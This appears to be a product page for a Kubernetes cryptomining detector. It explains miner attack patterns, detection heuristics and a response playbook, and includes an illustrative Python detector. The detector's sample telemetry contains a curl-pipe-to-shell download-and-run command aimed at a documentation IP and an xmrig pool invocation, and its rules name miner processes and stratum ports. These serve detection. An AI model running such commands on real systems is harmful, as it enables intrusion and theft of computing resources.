
Cryptomining Detection

A compromised deployment becomes a mining rig within minutes. Cryptomining attacks account for a large share of cloud security incidents — and image scanning won't catch a miner that's deployed post-launch.


How cryptomining attacks work in Kubernetes

Attackers typically gain initial access via a misconfigured deployment, exposed API server, or vulnerable application. Once inside a pod, they download a mining binary (commonly xmrig or similar) and execute it. The attack often persists for days or weeks before discovery via a cloud billing spike.

  • Executes via post-deploy download — image scans clean, binary downloaded after container starts
  • Establishes outbound connection to mining pool — typically stratum protocol, port 3333/4444/14444
  • Sustains near-100% CPU on affected pods — visible in cloud billing but often attributed to application load
  • Spreads to co-located pods — attackers with cluster access deploy mining DaemonSets across all nodes

How Kubesentry detects cryptomining

  • Process name heuristics — flags known mining process names and argument patterns (xmrig, minerd, cpuminer) at exec() time
  • CPU anomaly baseline — detects workloads consuming 90%+ CPU sustained for >30s when baseline shows typical 10-30%
  • Outbound connection analysis — monitors connect() syscalls for connections to known mining pool IP ranges and stratum protocol ports
  • Curl/wget exec detection — alerts on shell executions that download and immediately execute a binary, a common miner installation pattern
  • K8s audit log correlation — cross-references with API server events to identify whether the attacker also deployed additional pods
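As an added illustration (not Kubesentry's code), the exec, connection and CPU heuristics above applied to constructed pod telemetry; the event shapes, the stratum URL argument pattern and the curl-pipe-to-shell pattern are assumptions, while the process names and ports come from the list above:

```python
import re
from statistics import mean
MINER_PROCS = {"xmrig", "minerd", "cpuminer"}        # process names from the page
STRATUM_PORTS = {3333, 4444, 14444}                  # stratum ports from the page
POOL_ARG_RE = re.compile(r"stratum\+(tcp|ssl)://")   # assumed argument pattern
DL_EXEC_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")  # assumed download-and-run pattern

def check_exec(ev):
    """Process-name / argument heuristic at exec() time; ev = {'comm', 'args'}."""
    args = " ".join(ev.get("args", []))
    if ev["comm"].lower() in MINER_PROCS:
        return f"known miner process: {ev['comm']}"
    if POOL_ARG_RE.search(args):
        return "stratum pool URL in arguments"
    if DL_EXEC_RE.search(args):
        return "shell downloads and immediately executes"
    return None

def check_connect(ev):
    """Outbound connect() to a stratum-style port; ev = {'dport'}."""
    return f"connect to stratum port {ev['dport']}" if ev["dport"] in STRATUM_PORTS else None

def check_cpu(samples, window_s=30, hot=90.0, baseline_max=30.0):
    """samples = [(ts_seconds, cpu_pct), ...]; fire on >= hot% for > window_s after a quiet baseline."""
    start = None
    for i, (t, p) in enumerate(samples):
        if p < hot:
            start = None                      # run broken: not sustained
        elif start is None:
            start = i                         # first hot sample of a run
        elif t - samples[start][0] > window_s:
            before = [q for _, q in samples[:start]]
            if before and mean(before) <= baseline_max:
                return f"cpu >= {hot:.0f}% for > {window_s}s (baseline {mean(before):.0f}%)"
            return None                       # hot, but no quiet baseline to compare against
    return None

def triage(exec_events, connect_events, cpu_samples):
    """All findings for one pod; an empty list means nothing fired."""
    findings = [r for ev in exec_events if (r := check_exec(ev))]
    findings += [r for ev in connect_events if (r := check_connect(ev))]
    cpu = check_cpu(cpu_samples)
    return findings + ([cpu] if cpu else [])

# Constructed telemetry for one pod (not real data): clean app start, then a miner.
POD_EXECS = [{"comm": "python3", "args": ["python3", "app.py"]},
             {"comm": "sh", "args": ["sh", "-c", "curl -s http://203.0.113.5/m | sh"]},
             {"comm": "xmrig", "args": ["xmrig", "-o", "stratum+tcp://pool.invalid:3333"]}]
POD_CONNECTS = [{"dport": 443}, {"dport": 3333}]
POD_CPU = [(0, 12.0), (10, 18.0), (20, 15.0), (30, 95.0), (40, 97.0), (50, 99.0), (60, 98.0), (70, 96.0)]
```

Running `triage(POD_EXECS, POD_CONNECTS, POD_CPU)` on the constructed data yields four findings: the download-and-run shell, the xmrig exec, the port 3333 connection, and the sustained CPU spike against a 15% baseline.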

Response playbook

  1. Confirm the detection. Review the process name, parent PID, and CPU metrics in the Kubesentry alert. Check whether the mining binary matches known hashes.
  2. Assess blast radius. Check if other pods in the same namespace or node are exhibiting similar patterns. Review K8s audit logs for unauthorized deployments.
  3. Terminate mining processes. Delete affected pods. If the mining binary was deployed as a DaemonSet, delete the DaemonSet first to prevent respawn.
  4. Revoke compromised credentials. Rotate service account tokens associated with the compromised namespace. Review RBAC bindings for excessive permissions.
  5. Identify the initial access vector. Trace the attack chain from the exec() event backward to the entry point — HTTP exploit, exposed endpoint, or compromised CI/CD credential.
  6. File cloud provider security report. Most providers (AWS, GCP, Azure) have channels for reporting compromised-account mining to recover costs. Document the timeline.

Catch miners in seconds, not in your cloud bill.

eBPF-based detection, 30-second P99 alert latency.